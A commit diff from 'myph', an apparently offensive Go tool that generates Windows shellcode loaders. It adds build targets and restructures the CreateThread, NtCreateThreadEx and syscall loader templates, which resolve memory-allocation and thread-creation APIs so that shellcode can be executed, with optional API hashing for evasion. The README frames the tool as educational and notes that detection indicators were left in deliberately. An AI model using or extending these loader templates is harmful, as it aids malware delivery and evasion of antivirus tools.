v1.2.3: minor fixes

Author: djnnvx

.goreleaser.yaml

@@ -20,6 +20,8 @@ builds:
       - linux
       - windows
       - darwin
+    goarch:
+      - amd64
 
 archives:
   - format: tar.gz

Makefile

@@ -2,7 +2,7 @@
 # -------------------
 
 APP_NAME = myph
-APP_VERSION = 1.2.2
+APP_VERSION = 1.2.3
 GIT_REVISION = `git rev-parse HEAD`
 DOCKER_IMAGE_TAG ?= $(APP_VERSION)
 DOCKER_LOCAL_IMAGE = $(APP_NAME):$(DOCKER_IMAGE_TAG)
@@ -56,3 +56,7 @@ clean: ## clean up the project directory
 .PHONY: docker
 docker: ## build a local docker image
 	@docker build . -t $(APP_NAME):latest -t $(APP_NAME):$(APP_VERSION)
+
+.PHONY: release-build
+release-build: ## makes a release build locally on the current commit
+	@goreleaser release --skip=publish --snapshot

README.md

@@ -12,6 +12,9 @@ for general information and testing. The tool and this repository are carefully
 However, the developers cannot be held liable for for any damage, direct or indirect, of whatever nature as a result of
 or related to the access to or use of the software.
 
+> IOCs have voluntarily been added to the project. Don't open any issues regarding detections, it's pointless.
+> The goal of this project is to learn & teach. If you want a FUD loader, dont be a baby and make your own.
+
 ## How to use the software ?
 
 > Please note this project is under development & subject to changes.

cli/parser.go

@@ -71,7 +71,7 @@ func BuildLoader(opts *Options) *exec.Cmd {
 
 func GetParser(opts *Options) *cobra.Command {
 
-	version := "1.2.2"
+	version := "1.2.3"
 	var spoofMetadata = &cobra.Command{
 		Use:                "spoof",
 		Version:            version,
@@ -143,6 +143,32 @@ func GetParser(opts *Options) *cobra.Command {
 				os.Exit(1)
 			}
 
+			if opts.UseAPIHashing {
+				fmt.Printf("[+] Retrieving dependencies to use API Hashing...\n")
+
+				execGoGetCmd := exec.Command("go", "get", "github.com/Binject/debug/pe")
+				execGoGetCmd.Dir = MYPH_TMP_DIR
+				_, _ = execGoGetCmd.Output()
+
+				if opts.WithDebug {
+					// if running debug, we want to have the local internals because
+					// it makes development easier
+
+					fmt.Printf("[+] Running \"cp -r ./internals /tmp/myph-out\"\n")
+
+					execGoGetCmd = exec.Command("cp", "-r", "./internals", MYPH_TMP_DIR)
+					execGoGetCmd.Dir = "."
+					_, _ = execGoGetCmd.Output()
+
+				} else {
+					// this should stay to cmepw addr
+					execGoGetCmd = exec.Command("go", "get", "github.com/cmepw/myph/internals")
+					execGoGetCmd.Dir = MYPH_TMP_DIR
+					_, _ = execGoGetCmd.Output()
+				}
+
+			}
+
 			/* reading the shellcode as a series of bytes */
 			shellcode, err := tools.ReadFile(opts.ShellcodePath)
 			if err != nil {
@@ -274,12 +300,6 @@ func GetParser(opts *Options) *cobra.Command {
 
 			fmt.Printf("\n[+] Template (%s) written to tmp directory. Compiling...\n", opts.Technique)
 
-			if opts.UseAPIHashing {
-				execGoGetCmd := exec.Command("go", "get", "github.com/Binject/debug/pe")
-				execGoGetCmd.Dir = MYPH_TMP_DIR
-				_, _ = execGoGetCmd.Output()
-			}
-
 			execCmd := BuildLoader(opts)
 			execCmd.Dir = MYPH_TMP_DIR
 

loaders/createThread.go

@@ -35,24 +35,15 @@ import (
 }
 
 func (t CreateTTemplate) Const() string {
-	return fmt.Sprintf(`
+	if !t.UseApiHashing {
+
+		return fmt.Sprintf(`
 const (
 	MEM_COMMIT             = 0x1000
 	MEM_RESERVE            = 0x2000
 	PAGE_EXECUTE_READWRITE = 0x40
 )
 
-
-`)
-}
-
-func (t CreateTTemplate) Init() string {
-
-	if t.UseApiHashing {
-		return fmt.Sprintf("\n")
-	}
-
-	return fmt.Sprintf(`
 var (
 	kernel32        = syscall.MustLoadDLL("kernel32.dll")
 	ntdll           = syscall.MustLoadDLL("ntdll.dll")
@@ -63,7 +54,23 @@ var (
 
     RtlCopyMemory   = ntdll.MustFindProc("RtlCopyMemory")
 )
-    `)
+        `)
+
+	}
+
+	return fmt.Sprintf(`
+const (
+	MEM_COMMIT             = 0x1000
+	MEM_RESERVE            = 0x2000
+	PAGE_EXECUTE_READWRITE = 0x40
+)
+
+
+`)
+}
+
+func (t CreateTTemplate) Init() string {
+	return fmt.Sprintf("\n")
 }
 
 func (t CreateTTemplate) Process() string {

loaders/ntCreateThreadEx.go

@@ -29,6 +29,8 @@ import (
 
 	return fmt.Sprintf(`
 import (
+    "fmt"
+    "log"
 	"syscall"
 	"unsafe"
 )
@@ -38,30 +40,40 @@ import (
 func (t NtCreateThreadExTemplate) Const() string {
 	// same consts with or without API Hashing
 
-	return fmt.Sprintf(`
-const (
-	MEM_COMMIT = 0x1000
-	MEM_RESERVE = 0x2000
-	PAGE_EXECUTE_READ = 0x20
-	PAGE_READWRITE = 0x04
-)
-`)
-}
-
-func (t NtCreateThreadExTemplate) Init() string {
-
 	if t.UseApiHashing {
-		return fmt.Sprintf("\n")
+		return fmt.Sprintf(`
+        const (
+            MEM_COMMIT = 0x1000
+            MEM_RESERVE = 0x2000
+            PAGE_EXECUTE_READ = 0x20
+            PAGE_READWRITE = 0x04
+        )
+        `)
 	}
 
 	return fmt.Sprintf(`
-	ntdll := syscall.MustLoadDLL("ntdll.dll")
+    const (
+            MEM_COMMIT = 0x1000
+            MEM_RESERVE = 0x2000
+            PAGE_EXECUTE_READ = 0x20
+            PAGE_READWRITE = 0x04
+        )
+
+    var (
 
-    NtAllocateVirtualMemory = ntdll.MustFindProd("NtAllocateVirtualMemory")
-    NtWriteVirtualMemory = ntdll.MustFindProd("NtWriteVirtualMemory")
-    NtProtectVirtualMemory = ntdll.MustFindProd("NtProtectVirtualMemory")
-    NtCreateThreadEx = ntdll.MustFindProd("NtCreateThreadEx")
+	ntdll = syscall.MustLoadDLL("ntdll.dll")
+
+    NtAllocateVirtualMemory = ntdll.MustFindProc("NtAllocateVirtualMemory")
+    NtWriteVirtualMemory = ntdll.MustFindProc("NtWriteVirtualMemory")
+    NtProtectVirtualMemory = ntdll.MustFindProc("NtProtectVirtualMemory")
+    NtCreateThreadEx = ntdll.MustFindProc("NtCreateThreadEx")
+    )
 `)
+
+}
+
+func (t NtCreateThreadExTemplate) Init() string {
+	return fmt.Sprintf("\n")
 }
 
 func (t NtCreateThreadExTemplate) Process() string {

loaders/syscall.go

@@ -36,34 +36,43 @@ import (
 }
 
 func (t SysTemplate) Const() string {
-	// same consts with or without API Hashing
 
-	return fmt.Sprintf(`
+	if t.UseApiHashing {
+		return fmt.Sprintf(`
 const (
 	MEM_COMMIT = 0x1000
 	MEM_RESERVE = 0x2000
 	PAGE_EXECUTE_READ = 0x20
 	PAGE_READWRITE = 0x04
 )
 `)
-}
-
-func (t SysTemplate) Init() string {
 
-	if t.UseApiHashing {
-		return fmt.Sprintf("\n")
 	}
 
 	return fmt.Sprintf(`
-	kernel32 := syscall.MustLoadDLL("kernel32.dll")
-	ntdll := syscall.MustLoadDLL("ntdll.dll")
+const (
+	MEM_COMMIT = 0x1000
+	MEM_RESERVE = 0x2000
+	PAGE_EXECUTE_READ = 0x20
+	PAGE_READWRITE = 0x04
+)
+
+var (
+    kernel32 = syscall.MustLoadDLL("kernel32.dll")
+	ntdll = syscall.MustLoadDLL("ntdll.dll")
+
+	VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
+	VirtualProtect = kernel32.MustFindProc("VirtualProtect")
+	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
+)
 
-	VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
-	VirtualProtect := kernel32.MustFindProc("VirtualProtect")
-	RtlCopyMemory := ntdll.MustFindProc("RtlCopyMemory")
 `)
 }
 
+func (t SysTemplate) Init() string {
+	return fmt.Sprintf("\n")
+}
+
 func (t SysTemplate) Process() string {
 	if t.UseApiHashing {
 		return fmt.Sprintf(`

loaders/utils.go

@@ -3,7 +3,7 @@ package loaders
 func InformExpermimental() {
 	println("[!] The API hashing feature is still in an an experimental stage!!")
 	println("Only a few methods are supported for now:")
-	println("\t-Syscall\n\t-CreateThread\n\t-tNtCreateThreadEx\n")
+	println("\t-Syscall\n\t-CreateThread\n\t-NtCreateThreadEx\n")
 }
 
 func InformProcessUnused(process string) {